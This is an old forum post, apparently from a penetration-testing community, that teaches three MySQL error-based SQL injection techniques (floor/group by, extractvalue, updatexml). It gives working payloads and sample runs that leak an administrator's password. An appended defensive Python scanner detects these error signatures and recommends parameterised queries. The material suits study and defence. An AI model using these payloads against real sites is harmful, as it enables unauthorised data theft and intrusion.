中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: On the three error-based techniques used in MySQL injection

Author: admin    Time: 2012-12-10 10:28
Posting some of my old notes. MySQL throws error messages while executing statements, and php+mysql sites often display the error text on the page, so the following three methods can be constructed to obtain specific data.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error with floor
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id input is injectable, the following statement can be used to trigger the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version was successfully leaked in the error; to retrieve other data, replace the version() expression with the desired query.
For example, to retrieve the administrator's username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.
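As an added defender-side example (not part of the original post), the Python below scans application error-log lines for the three error signatures shown in the post, names the technique behind each and recovers the value that leaked inside the message so the exposure can be scoped. The log lines are constructed, and the assumption is that the application logs the raw MySQL error text much as the mysql client prints it.

```python
import re

# Constructed sample log lines (not from the original post). They mirror the
# three error messages the post shows, plus a benign duplicate-key error and
# a normal line, so the scanner's false-positive behaviour is visible.
SAMPLE_LOG = """\
2012-12-10 10:28:01 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
2012-12-10 10:28:02 ERROR 1105 (HY000): XPATH syntax error: '\\admin888'
2012-12-10 10:28:03 ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
2012-12-10 10:28:04 ERROR 1062 (23000): Duplicate entry '7' for key 'PRIMARY'
2012-12-10 10:28:05 query ok, 1 row returned
"""

def _strip_floor_bit(v):
    # floor(rand(0)*2) appends a trailing 0 or 1 to the leaked value.
    return v[:-1] if v[-1:] in "01" else v

# (technique, regex for the error text, function recovering the leaked value)
RULES = [
    ("floor/group_by",
     re.compile(r"ERROR 1062 \(23000\): Duplicate entry '(?P<v>.*)' for key 'group_key'"),
     _strip_floor_bit),
    # the updatexml payload on the page wraps the value in 0x5e24, i.e. "^$"
    ("updatexml",
     re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '\^\$(?P<v>.*)\^\$'"),
     lambda v: v),
    # the extractvalue payload on the page prefixes the value with 0x5c, a backslash
    ("extractvalue",
     re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '\\(?P<v>.*)'"),
     lambda v: v),
]

def classify(line):
    """Return (technique, leaked_value) for a line carrying one of the three
    error-based injection signatures, or None for anything else."""
    for name, rx, recover in RULES:
        m = rx.search(line)
        if m:
            return name, recover(m.group("v"))
    return None

def scan(log_text):
    """Return [(line_no, technique, leaked_value), ...] for a whole log."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = classify(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits

if __name__ == "__main__":
    for n, tech, leaked in scan(SAMPLE_LOG):
        print(f"line {n}: {tech} leaked {leaked!r}")
```

A genuine duplicate-key error on a real index (the `PRIMARY` line) is deliberately not flagged, since only the `group_key` form is the floor trick. The underlying fix is still parameterised queries in the PHP code plus `display_errors=Off` so database errors never reach the page.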
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2